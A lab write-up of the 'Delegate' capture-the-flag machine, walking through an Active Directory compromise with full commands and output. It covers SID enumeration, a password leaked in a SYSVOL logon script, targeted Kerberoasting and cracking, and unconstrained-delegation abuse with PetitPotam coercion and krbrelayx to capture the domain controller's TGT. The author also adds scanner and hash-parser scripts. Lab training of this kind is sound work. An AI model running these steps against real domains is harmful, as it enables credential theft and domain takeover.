vulnlab-delegate
a hard machine
Enumerate domain SIDs through a null session as guest. Five user accounts and one custom group, delegation admins, stand out:

┌──(puck㉿kali)-[~/vulnhub/delegate]
└─$ impacket-lookupsid guest@delegate.vl 10000
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

Password:
[*] Brute forcing SIDs at delegate.vl
[*] StringBinding ncacn_np:delegate.vl[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-1484473093-3449528695-2030935120
498: DELEGATE\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: DELEGATE\Administrator (SidTypeUser)
501: DELEGATE\Guest (SidTypeUser)
502: DELEGATE\krbtgt (SidTypeUser)
512: DELEGATE\Domain Admins (SidTypeGroup)
513: DELEGATE\Domain Users (SidTypeGroup)
514: DELEGATE\Domain Guests (SidTypeGroup)
515: DELEGATE\Domain Computers (SidTypeGroup)
516: DELEGATE\Domain Controllers (SidTypeGroup)
517: DELEGATE\Cert Publishers (SidTypeAlias)
518: DELEGATE\Schema Admins (SidTypeGroup)
519: DELEGATE\Enterprise Admins (SidTypeGroup)
520: DELEGATE\Group Policy Creator Owners (SidTypeGroup)
521: DELEGATE\Read-only Domain Controllers (SidTypeGroup)
522: DELEGATE\Cloneable Domain Controllers (SidTypeGroup)
525: DELEGATE\Protected Users (SidTypeGroup)
526: DELEGATE\Key Admins (SidTypeGroup)
527: DELEGATE\Enterprise Key Admins (SidTypeGroup)
553: DELEGATE\RAS and IAS Servers (SidTypeAlias)
571: DELEGATE\Allowed RODC Password Replication Group (SidTypeAlias)
572: DELEGATE\Denied RODC Password Replication Group (SidTypeAlias)
1000: DELEGATE\DC1$ (SidTypeUser)
1101: DELEGATE\DnsAdmins (SidTypeAlias)
1102: DELEGATE\DnsUpdateProxy (SidTypeGroup)
1104: DELEGATE\A.Briggs (SidTypeUser)
1105: DELEGATE\b.Brown (SidTypeUser)
1106: DELEGATE\R.Cooper (SidTypeUser)
1107: DELEGATE\J.Roberts (SidTypeUser)
1108: DELEGATE\N.Thompson (SidTypeUser)
1121: DELEGATE\delegation admins (SidTypeGroup)
AS-REP roasting check on the discovered users: none of them has pre-authentication disabled. The closing "invalid principal syntax" comes from one line of users.txt that is not a valid principal (most likely a blank line) and is not a finding:

┌──(puck㉿kali)-[~/vulnhub/delegate]
└─$ impacket-GetNPUsers delegate.vl/puck -usersfile users.txt -dc-ip dc1.delegate.vl
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

Password:
[-] User A.Briggs doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User b.Brown doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User R.Cooper doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User J.Roberts doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User N.Thompson doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] invalid principal syntax
SYSVOL is readable with an arbitrary (non-existent) user and an empty password. The logon script scripts\users.bat maps a share for A.Briggs with a hard-coded Administrator password:

┌──(puck㉿kali)-[~/vulnhub/delegate]
└─$ smbclient //delegate.vl/SYSVOL -U puck
Password for [WORKGROUP\puck]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sat Sep  9 09:52:30 2023
  ..                                  D        0  Sat Aug 26 05:39:25 2023
  delegate.vl                        Dr        0  Sat Aug 26 05:39:25 2023

		5242879 blocks of size 4096. 1960185 blocks available
smb: \> cd delegate.vl\
smb: \delegate.vl\> ls
  .                                   D        0  Sat Aug 26 05:45:45 2023
  ..                                  D        0  Sat Aug 26 05:39:25 2023
  DfsrPrivate                      DHSr        0  Sat Aug 26 05:45:45 2023
  Policies                            D        0  Sat Aug 26 05:39:30 2023
  scripts                             D        0  Sat Aug 26 08:45:24 2023

		5242879 blocks of size 4096. 1960185 blocks available
smb: \delegate.vl\> cd scripts
smb: \delegate.vl\scripts\> ls
  .                                   D        0  Sat Aug 26 08:45:24 2023
  ..                                  D        0  Sat Aug 26 05:45:45 2023
  users.bat                           A      159  Sat Aug 26 08:54:29 2023

		5242879 blocks of size 4096. 1960182 blocks available
smb: \delegate.vl\scripts\> get users.bat
getting file \delegate.vl\scripts\users.bat of size 159 as users.bat (1.6 KiloBytes/sec) (average 1.6 KiloBytes/sec)
smb: \delegate.vl\scripts\>

┌──(puck㉿kali)-[~/vulnhub/delegate]
└─$ cat users.bat
rem @echo off
net use * /delete /y
net use v: \\dc1\development
if %USERNAME%==A.Briggs net use h: \\fileserver\backups /user:Administrator P4ssw0rd1#123
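Logon scripts in SYSVOL are readable by every domain member, so a password on a net use line is a domain-wide leak. The scanner below is an added example (mine, not the box author's) that pulls such credentials out of batch scripts; it handles the if %USERNAME%== guard seen above, accepts the password on either side of /user:, and does not report a bare * (which only makes Windows prompt). The sample script is constructed from the users.bat above plus one invented J.Roberts / svc_scan line that uses the * prompt:

```python
"""
Scan Windows logon scripts (the kind dropped in SYSVOL\\<domain>\\scripts) for
credentials passed to 'net use' on the command line.  Added example, not the
box author's code; the sample script is constructed from the users.bat above
plus one invented line (J.Roberts / svc_scan) that maps a share with a '*'
password prompt, which must not be reported.
"""
import re
from dataclasses import dataclass
from typing import List

_DRIVE_RE = re.compile(r"[a-z]:", re.IGNORECASE)


@dataclass(frozen=True)
class ExposedCredential:
    line_no: int
    share: str
    user: str
    password: str


def find_net_use_creds(script: str) -> List[ExposedCredential]:
    """Return every 'net use' invocation that carries both /user: and a literal password."""
    found: List[ExposedCredential] = []
    for line_no, raw in enumerate(script.splitlines(), start=1):
        tokens = raw.strip().split()
        if not tokens or tokens[0].lower() == "rem" or tokens[0].startswith("::"):
            continue                          # batch comment lines
        lowered = [t.lower() for t in tokens]
        # 'net use' may sit behind an 'if %USERNAME%==...' guard, so find it anywhere on the line
        starts = [i for i in range(len(lowered) - 1) if lowered[i] == "net" and lowered[i + 1] == "use"]
        if not starts:
            continue
        share = user = password = None
        for tok in tokens[starts[0] + 2:]:
            if tok.lower().startswith("/user:"):
                user = tok[len("/user:"):]
            elif tok.startswith("/"):
                continue                      # /persistent:, /delete, /y, ...
            elif tok.startswith("\\\\"):
                share = tok                   # \\server\share
            elif tok == "*" or _DRIVE_RE.fullmatch(tok):
                continue                      # drive letter, 'any drive', or 'prompt for password'
            else:
                password = tok                # only a literal password is a finding
        if user and password:
            found.append(ExposedCredential(line_no, share or "", user, password))
    return found


# Constructed sample: lines 1-4 are the users.bat from the box, line 5 is invented.
SAMPLE_USERS_BAT = r"""rem @echo off
net use * /delete /y
net use v: \\dc1\development
if %USERNAME%==A.Briggs net use h: \\fileserver\backups /user:Administrator P4ssw0rd1#123
if %USERNAME%==J.Roberts net use s: \\fileserver\scans * /user:delegate\svc_scan /persistent:no
"""

if __name__ == "__main__":
    for cred in find_net_use_creds(SAMPLE_USERS_BAT):
        print(f"line {cred.line_no}: {cred.user}:{cred.password} for {cred.share}")
```

Run it over every *.bat, *.cmd and *.vbs under \\dc\SYSVOL\<domain>\scripts and the Policies\ tree; the same pattern (a password as a positional argument) also shows up in scheduled-task and runas lines.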
BloodHound for more info. The password from users.bat is reused for A.Briggs' domain account, so collection runs as A.Briggs:
┌──(puck㉿kali)-[~/vulnhub/delegate]
└─$ bloodhound-python -d delegate.vl -c all -u 'A.Briggs' -p 'P4ssw0rd1#123' -ns 10.10.114.169
INFO: Found AD domain: delegate.vl
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc1.delegate.vl
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc1.delegate.vl
INFO: Found 9 users
INFO: Found 53 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC1.delegate.vl
INFO: Done in 00M 07S
Upload the data to BloodHound; it shows:

The user A.BRIGGS@DELEGATE.VL has generic write access to the user N.THOMPSON@DELEGATE.VL.

GenericWrite grants the ability to write any non-protected attribute on the target object, including member on a group and servicePrincipalName on a user. Writing an SPN onto N.Thompson makes the account Kerberoastable: any authenticated domain user can then request a service ticket for that SPN, which is encrypted with N.Thompson's key (RC4 keyed by the NT hash, as long as RC4 is allowed), and crack it offline.
A targeted Kerberoast can be performed with targetedKerberoast.py (ShutdownRepo):

targetedKerberoast.py -v -d 'domain.local' -u 'controlledUser' -p 'ItsPassword'

The tool sets a temporary SPN on every user the supplied account can write to (or only on the user given with --request-user), requests the TGS, prints the crackable hash, and then restores the attribute.
┌──(puck㉿kali)-[~/vulnhub/delegate]
└─$ cd targetedKerberoast

┌──(puck㉿kali)-[~/vulnhub/delegate/targetedKerberoast]
└─$ ls
kerberoastables.txt  LICENSE  README.md  requirements.txt  targetedKerberoast.py

┌──(puck㉿kali)-[~/vulnhub/delegate/targetedKerberoast]
└─$ python3 -m venv venv

┌──(puck㉿kali)-[~/vulnhub/delegate/targetedKerberoast]
└─$ ls
kerberoastables.txt  LICENSE  README.md  requirements.txt  targetedKerberoast.py  venv

┌──(puck㉿kali)-[~/vulnhub/delegate/targetedKerberoast]
└─$ source venv/bin/activate

┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/targetedKerberoast]
└─$ pip3 install -r requirements.txt
Collecting ldap3 (from -r requirements.txt (line 1))
  Using cached ldap3-2.9.1-py2.py3-none-any.whl.metadata (5.4 kB)
--snip--
  Using cached pycparser-2.22-py3-none-any.whl (117 kB)
Installing collected packages: six, pygments, pycryptodomex, pycryptodome, pycparser, pyasn1, mdurl, MarkupSafe, itsdangerous, future, dsinternals, dnspython, click, charset-normalizer, blinker, Werkzeug, markdown-it-py, ldap3, Jinja2, cffi, rich, ldapdomaindump, flask, cryptography, pyOpenSSL, impacket
Successfully installed Jinja2-3.1.4 MarkupSafe-2.1.5 Werkzeug-3.0.3 blinker-1.8.2 cffi-1.16.0 charset-normalizer-3.3.2 click-8.1.7 cryptography-42.0.8 dnspython-2.6.1 dsinternals-1.2.4 flask-3.0.3 future-1.0.0 impacket-0.11.0 itsdangerous-2.2.0 ldap3-2.9.1 ldapdomaindump-0.9.4 markdown-it-py-3.0.0 mdurl-0.1.2 pyOpenSSL-24.1.0 pyasn1-0.6.0 pycparser-2.22 pycryptodome-3.20.0 pycryptodomex-3.20.0 pygments-2.18.0 rich-13.7.1 six-1.16.0

┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/targetedKerberoast]
└─$ python3 targetedKerberoast.py -u 'A.Briggs' -p 'P4ssw0rd1#123' --request-user N.Thompson -d 'delegate.vl'
[*] Starting kerberoast attacks
[*] Attacking user (N.Thompson)
[+] Printing hash for (N.Thompson)
$krb5tgs$23$*N.Thompson$DELEGATE.VL$delegate.vl/N.Thompson*$69b5ede798c5c49a1d7fa396a7746c96$--snip--
Save the hash to hash.txt and crack it with john. Note the "etype 23" in john's banner: the ticket is RC4-encrypted, so the key is N.Thompson's raw NT hash and cracking is fast:

┌──(puck㉿kali)-[~/vulnhub/delegate]
└─$ john -w:/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
KALEB_2341       (?)
1g 0:00:00:03 DONE (2024-06-10 12:40) 0.2695g/s 2966Kp/s 2966Kc/s 2966KC/s KANECHA1..KABYLS3427
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
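When a roast returns several hashes it pays to read the etype before cracking: 23 means RC4 keyed directly by the NT hash, 17/18 mean AES with a salted, 4096-iteration PBKDF2 key, which cracks orders of magnitude slower. The parser below is an added example (mine, not part of targetedKerberoast, john or hashcat) that splits the $krb5tgs$ lines into user, realm, SPN, checksum and ticket length and ranks them. The RC4 layout is the one printed above; the AES layout ($krb5tgs$17$user$REALM$*spn*$cksum$edata) is assumed from impacket's GetUserSPNs output and is not shown on this page. The sample hashes are constructed: the N.Thompson line reuses the user, realm, SPN and checksum printed above with made-up ticket bytes, and the svc_web line is entirely invented.

```python
"""
Parse $krb5tgs$ lines (the format targetedKerberoast, GetUserSPNs, john and
hashcat share) and report which encryption type protects each ticket.
Added example, not from the box author or from any of those tools.

Layouts handled:
  RC4 (etype 23): $krb5tgs$23$*user$REALM$spn*$<16-byte cksum hex>$<edata hex>
  AES (17 / 18):  $krb5tgs$17$user$REALM$*spn*$<12-byte cksum hex>$<edata hex>
The AES layout is assumed from impacket's GetUserSPNs; the '*spn*$' part is optional.
"""
import re
from dataclasses import dataclass
from typing import List

ETYPE_INFO = {
    23: "rc4-hmac: key is the NT hash, unsalted, no stretching; cracks fast",
    17: "aes128-cts-hmac-sha1-96: salted PBKDF2 (4096 rounds); orders of magnitude slower",
    18: "aes256-cts-hmac-sha1-96: salted PBKDF2 (4096 rounds); orders of magnitude slower",
}

_RC4_RE = re.compile(
    r"^\$krb5tgs\$23\$\*(?P<user>[^$*]+)\$(?P<realm>[^$*]+)\$(?P<spn>[^*]+)\*"
    r"\$(?P<cksum>[0-9a-fA-F]{32})\$(?P<edata>[0-9a-fA-F]+)$"
)
_AES_RE = re.compile(
    r"^\$krb5tgs\$(?P<etype>17|18)\$(?P<user>[^$*]+)\$(?P<realm>[^$*]+)\$"
    r"(?:\*(?P<spn>[^*]+)\*\$)?(?P<cksum>[0-9a-fA-F]{24})\$(?P<edata>[0-9a-fA-F]+)$"
)


@dataclass(frozen=True)
class Krb5TgsHash:
    etype: int
    user: str
    realm: str
    spn: str
    checksum: str
    edata_bytes: int          # length of the encrypted ticket part

    @property
    def rc4(self) -> bool:
        return self.etype == 23


def parse_krb5tgs(line: str) -> Krb5TgsHash:
    """Split one $krb5tgs$ line into its fields; raises ValueError on anything else."""
    line = line.strip()
    m = _RC4_RE.match(line)
    etype = 23
    if m is None:
        m = _AES_RE.match(line)
        if m is None:
            raise ValueError("not a recognised $krb5tgs$ hash")
        etype = int(m.group("etype"))
    return Krb5TgsHash(
        etype=etype,
        user=m.group("user"),
        realm=m.group("realm"),
        spn=m.group("spn") or "",
        checksum=m.group("cksum").lower(),
        edata_bytes=len(m.group("edata")) // 2,
    )


def triage(lines: List[str]) -> List[str]:
    """One summary per hash, RC4 ones marked to crack first, AES ones last."""
    out = []
    for h in sorted((parse_krb5tgs(l) for l in lines), key=lambda h: 0 if h.rc4 else 1):
        verdict = "crack first" if h.rc4 else "crack last"
        out.append(f"{h.user}@{h.realm} spn={h.spn or '-'} etype={h.etype} ({verdict}): {ETYPE_INFO[h.etype]}")
    return out


# Constructed samples (see the lead-in); the ticket bytes are not real ciphertext.
SAMPLE_HASHES = [
    "$krb5tgs$18$svc_web$DELEGATE.VL$*http/web.delegate.vl*$" + "ab" * 12 + "$" + "cd" * 40,
    "$krb5tgs$23$*N.Thompson$DELEGATE.VL$delegate.vl/N.Thompson*$69b5ede798c5c49a1d7fa396a7746c96$"
    + "a1b2c3d4" * 32,
]

if __name__ == "__main__":
    for summary in triage(SAMPLE_HASHES):
        print(summary)
```

On the defensive side the same field is the tell: an account whose tickets come back as etype 23 either has no AES keys or still allows RC4 in msDS-SupportedEncryptionTypes; fixing that (and a long random password for the service account) is what turns a three-second crack into an infeasible one.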
N.Thompson's password is KALEB_2341. Check the MachineAccountQuota with the crackmapexec maq module; the default of 10 means any authenticated user can add up to ten machine accounts, which the rest of the chain relies on:

┌──(puck㉿kali)-[~/vulnhub/delegate]
└─$ crackmapexec ldap delegate.vl -u 'N.Thompson' -p 'KALEB_2341' -M maq
SMB         dc1.delegate.vl 445    DC1              [*] Windows Server 2022 Build 20348 x64 (name:DC1) (domain:delegate.vl) (signing:True) (SMBv1:False)
LDAP        dc1.delegate.vl 389    DC1              [+] delegate.vl\N.Thompson:KALEB_2341
MAQ         dc1.delegate.vl 389    DC1              [*] Getting the MachineAccountQuota
MAQ         dc1.delegate.vl 389    DC1              MachineAccountQuota: 10
New tools: dnstool.py and printerbug.py, both from krbrelayx. The plan is an unconstrained delegation abuse: create a machine account, set TRUSTED_FOR_DELEGATION on it, give it an SPN and a DNS record that resolve to the attacker box, then coerce DC1$ into authenticating to that name. Because the target account is trusted for unconstrained delegation, DC1$ includes a forwarded copy of its own TGT in the AP-REQ it sends, and a listener that knows the account's key can decrypt the service ticket and authenticator and save that TGT. dnstool.py adds the DNS record, printerbug.py (or PetitPotam) does the coercion and krbrelayx.py is the listener.
┌──(puck㉿kali)-[~/vulnhub/delegate]
└─$ git clone https://github.com/dirkjanm/krbrelayx.git
Cloning into 'krbrelayx'...
remote: Enumerating objects: 202, done.
remote: Counting objects: 100% (51/51), done.
remote: Compressing objects: 100% (24/24), done.
remote: Total 202 (delta 33), reused 30 (delta 27), pack-reused 151
Receiving objects: 100% (202/202), 102.06 KiB | 1.73 MiB/s, done.
Resolving deltas: 100% (109/109), done.

┌──(puck㉿kali)-[~/vulnhub/delegate]
└─$ cd krbrelayx

┌──(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ python3 -m venv venv

┌──(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ source venv/bin/activate

┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ ls
addspn.py  dnstool.py  krbrelayx.py  lib  LICENSE  printerbug.py  README.md  venv

┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ python3 -m pip3 install impacket
/home/puck/vulnhub/delegate/krbrelayx/venv/bin/python3: No module named pip3

┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ pip3 install impacket
Collecting impacket
  Using cached impacket-0.11.0-py3-none-any.whl
--snip--
  Using cached pycparser-2.22-py3-none-any.whl (117 kB)
Installing collected packages: six, pycryptodomex, pycparser, pyasn1, MarkupSafe, itsdangerous, future, dsinternals, dnspython, click, charset-normalizer, blinker, Werkzeug, ldap3, Jinja2, cffi, ldapdomaindump, flask, cryptography, pyOpenSSL, impacket
Successfully installed Jinja2-3.1.4 MarkupSafe-2.1.5 Werkzeug-3.0.3 blinker-1.8.2 cffi-1.16.0 charset-normalizer-3.3.2 click-8.1.7 cryptography-42.0.8 dnspython-2.6.1 dsinternals-1.2.4 flask-3.0.3 future-1.0.0 impacket-0.11.0 itsdangerous-2.2.0 ldap3-2.9.1 ldapdomaindump-0.9.4 pyOpenSSL-24.1.0 pyasn1-0.6.0 pycparser-2.22 pycryptodomex-3.20.0 six-1.16.0
More tools: bloodyAD (to set the userAccountControl flag), addspn.py and PetitPotam.py. The machine account UwU$ with password TestPassword321 is used below; its creation (permitted by the MachineAccountQuota of 10) is not shown in the transcript. In order: a DNS record UwU.delegate.vl pointing at the attacker (10.8.2.138), TRUSTED_FOR_DELEGATION on UwU$, the SPN cifs/UwU.delegate.vl on UwU$ (once via --additional, which writes msDS-AdditionalDnsHostName, and once straight into servicePrincipalName), and finally PetitPotam, authenticated as UwU$, coercing DC1 (10.10.81.86) into connecting to UwU.delegate.vl. The coercion must name the host that carries the SPN, not the IP, or the DC never asks the KDC for a ticket and falls back to NTLM.
┌──(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ ls
addspn.py  bloodyAD  dnstool.py  krbrelayx.py  lib  LICENSE  PetitPotam  printerbug.py  README.md  venv

┌──(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ python3 -m venv venv

┌──(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ source venv/bin/activate

┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ python3 dnstool.py -u 'delegate.vl\UwU$' -p TestPassword321 -r UwU.delegate.vl -d 10.8.2.138 --action add DC1.delegate.vl -dns-ip 10.10.81.86
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[-] Adding new record
[+] LDAP operation completed successfully

┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ cd bloodyAD

┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx/bloodyAD]
└─$ ls
bloodyAD  bloodyAD.py  LICENSE  pyproject.toml  README.md  requirements.txt  tests

┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx/bloodyAD]
└─$ python3 bloodyAD.py -u 'N.Thompson' -d 'delegate.vl' -p 'KALEB_2341' --host 'DC1.delegate.vl' add uac 'UwU$' -f TRUSTED_FOR_DELEGATION
[-] ['TRUSTED_FOR_DELEGATION'] property flags added to UwU$'s userAccountControl

┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx/bloodyAD]
└─$ cd ..

┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ python3 addspn.py -u 'delegate.vl\N.Thompson' -p 'KALEB_2341' -s 'cifs/UwU.delegate.vl' -t 'UwU$' -dc-ip 10.10.81.86 DC1.delegate.vl --additional
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[+] Found modification target
[+] SPN Modified successfully

┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ python3 addspn.py -u 'delegate.vl\N.Thompson' -p 'KALEB_2341' -s 'cifs/UwU.delegate.vl' -t 'UwU$' -dc-ip 10.10.81.86 DC1.delegate.vl
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[+] Found modification target
[+] SPN Modified successfully

┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ ls
addspn.py  bloodyAD  dnstool.py  krbrelayx.py  lib  LICENSE  PetitPotam  printerbug.py  README.md  venv

┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ cd PetitPotam

┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx/PetitPotam]
└─$ python3 PetitPotam.py -u 'UwU$' -p 'TestPassword321' UwU.delegate.vl 10.10.81.86
--snip (banner)--
PoC to elicit machine account authentication via some MS-EFSRPC functions
by topotam (@topotam77)

Inspired by @tifkin_ & @elad_shamir previous work on MS-RPRN

Trying pipe lsarpc
[-] Connecting to ncacn_np:10.10.81.86[\PIPE\lsarpc]
[+] Connected!
[+] Binding to c681d488-d850-11d0-8c52-00c04fd90f7e
[+] Successfully bound!
[-] Sending EfsRpcOpenFileRaw!
[-] Got RPC_ACCESS_DENIED!! EfsRpcOpenFileRaw is probably PATCHED!
[+] OK! Using unpatched function!
[-] Sending EfsRpcEncryptFileSrv!
[+] Got expected ERROR_BAD_NETPATH exception!!
[+] Attack worked!
Below: bloodyAD installed in a Python virtual environment (I had trouble with dependencies).
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ git clone https://github.com/CravateRouge/bloodyAD.git
Cloning into 'bloodyAD'...
remote: Enumerating objects: 1123, done.
remote: Counting objects: 100% (495/495), done.
remote: Compressing objects: 100% (274/274), done.
remote: Total 1123 (delta 263), reused 350 (delta 209), pack-reused 628
Receiving objects: 100% (1123/1123), 584.62 KiB | 5.41 MiB/s, done.
Resolving deltas: 100% (681/681), done.

┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ cd bloodyAD

┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx/bloodyAD]
└─$ ls
bloodyAD  bloodyAD.py  LICENSE  pyproject.toml  README.md  requirements.txt  tests

┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx/bloodyAD]
└─$ python3 bloodyAD.py -u 'N.Thompson' -d 'delegate.vl' -p 'KALEB_2341' --host 'DC1.delegate.vl' add uac 'UwU$' -f TRUSTED_FOR_DELEGATION
Traceback (most recent call last):
  File "/home/puck/vulnhub/delegate/krbrelayx/bloodyAD/bloodyAD.py", line 2, in <module>
    from bloodyAD import main
  File "/home/puck/vulnhub/delegate/krbrelayx/bloodyAD/bloodyAD/__init__.py", line 1, in <module>
    from .network.config import Config, ConnectionHandler
  File "/home/puck/vulnhub/delegate/krbrelayx/bloodyAD/bloodyAD/network/config.py", line 2, in <module>
    from bloodyAD.network.ldap import Ldap
  File "/home/puck/vulnhub/delegate/krbrelayx/bloodyAD/bloodyAD/network/ldap.py", line 5, in <module>
    from msldap.client import MSLDAPClient
ModuleNotFoundError: No module named 'msldap'

┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx/bloodyAD]
└─$ ls
bloodyAD  bloodyAD.py  LICENSE  pyproject.toml  README.md  requirements.txt  tests

┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx/bloodyAD]
└─$ pip3 install -r requirements.txt
Processing /home/puck/vulnhub/delegate/krbrelayx/bloodyAD
  Installing build dependencies ... done
  Getting requirements to build wheel ... done
  Preparing metadata (pyproject.toml) ... done
Collecting asn1crypto>=1.3.0 (from bloodyAD==2.0.3->-r requirements.txt (line 1))
--snip--
Successfully built bloodyAD
Installing collected packages: wcwidth, asn1crypto, unicrypto, tqdm, tabulate, prompt-toolkit, oscrypto, h11, winacl, asysocks, minikerberos, asyauth, msldap, bloodyAD
Successfully installed asn1crypto-1.5.1 asyauth-0.0.20 asysocks-0.2.12 bloodyAD-2.0.3 h11-0.14.0 minikerberos-0.4.4 msldap-0.5.10 oscrypto-1.3.0 prompt-toolkit-3.0.47 tabulate-0.9.0 tqdm-4.66.4 unicrypto-0.0.10 wcwidth-0.2.13 winacl-0.1.9

┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx/bloodyAD]
└─$ python3 bloodyAD.py -u 'N.Thompson' -d 'delegate.vl' -p 'KALEB_2341' --host 'DC1.delegate.vl' add uac 'UwU$' -f TRUSTED_FOR_DELEGATION
[-] ['TRUSTED_FOR_DELEGATION'] property flags added to UwU$'s userAccountControl
The krbrelayx listener, started before PetitPotam with the NT hash of UwU$ (the account that holds the SPN, so krbrelayx can decrypt the incoming service ticket), receives DC1$'s forwarded TGT and writes it to a ccache:

┌──(puck㉿kali)-[~/vulnhub/delegate]
└─$ cd krbrelayx

┌──(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ python3 krbrelayx.py -hashes :C7BE3644A2EB37C9BB1F248E9E0B9AFC
[*] Protocol Client HTTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Running in export mode (all tickets will be saved to disk). Works with unconstrained delegation attack only.
[*] Running in unconstrained delegation abuse mode using the specified credentials.
[*] Setting up SMB Server
[*] Setting up HTTP Server on port 80
[*] Setting up DNS Server
[*] Servers started, waiting for connections
[*] SMBD: Received connection from 10.10.81.86
[*] Got ticket for DC1$@DELEGATE.VL [krbtgt@DELEGATE.VL]
[*] Saving ticket in DC1$@DELEGATE.VL_krbtgt@DELEGATE.VL.ccache
[*] SMBD: Received connection from 10.10.81.86
[*] Got ticket for DC1$@DELEGATE.VL [krbtgt@DELEGATE.VL]
[*] Saving ticket in DC1$@DELEGATE.VL_krbtgt@DELEGATE.VL.ccache
Alternative route with Powermad and printerbug (a second run; the box is now at 10.10.105.77). Powermad's New-MachineAccount creates PWNED$ with the password 12345. userAccountControl is then set to 528384, which is 0x81000 = WORKSTATION_TRUST_ACCOUNT (0x1000) | TRUSTED_FOR_DELEGATION (0x80000), the same thing bloodyAD's add uac -f TRUSTED_FOR_DELEGATION did for UwU$. Setting that flag normally requires the SeEnableDelegationPrivilege user right ("Enable computer and user accounts to be trusted for delegation"); the delegation admins group from the SID enumeration is presumably how N.Thompson has it, but its membership was not checked here. Finally an HTTP SPN for PWNED.delegate.vl is appended; the HOST/ and RestrictedKrbHost/ SPNs already exist from account creation.
┌──(puck㉿kali)-[~/vulnhub/delegate]
└─$ evil-winrm -i DC1.delegate.vl -u N.Thompson -p KALEB_2341

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\N.Thompson\Documents> upload Powermad.ps1
Info: Uploading /home/puck/vulnhub/delegate/Powermad.ps1 to C:\Users\N.Thompson\Documents\Powermad.ps1
Data: 180768 bytes of 180768 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Users\N.Thompson\Documents> Import-Module .\Powermad.ps1
*Evil-WinRM* PS C:\Users\N.Thompson\Documents> New-MachineAccount -MachineAccount PWNED -Password $(ConvertTo-SecureString '12345' -AsPlainText -Force)
[+] Machine account PWNED added
*Evil-WinRM* PS C:\Users\N.Thompson\Documents> Set-MachineAccountAttribute -MachineAccount pwned -Attribute useraccountcontrol -Value 528384
[+] Machine account pwned attribute useraccountcontrol updated
*Evil-WinRM* PS C:\Users\N.Thompson\Documents> Set-MachineAccountAttribute -MachineAccount pwned -Attribute ServicePrincipalName -Value HTTP/PWNED.delegate.vl -Append
[+] Machine account pwned attribute ServicePrincipalName appended
*Evil-WinRM* PS C:\Users\N.Thompson\Documents> Get-MachineAccountAttribute -MachineAccount pwned -Attribute ServicePrincipalName -Verbose
Verbose: [+] Domain Controller = DC1.delegate.vl
Verbose: [+] Domain = delegate.vl
Verbose: [+] Distinguished Name = CN=pwned,CN=Computers,DC=delegate,DC=vl
HTTP/PWNED.delegate.vl
RestrictedKrbHost/PWNED
HOST/PWNED
RestrictedKrbHost/PWNED.delegate.vl
HOST/PWNED.delegate.vl
*Evil-WinRM* PS C:\Users\N.Thompson\Documents>
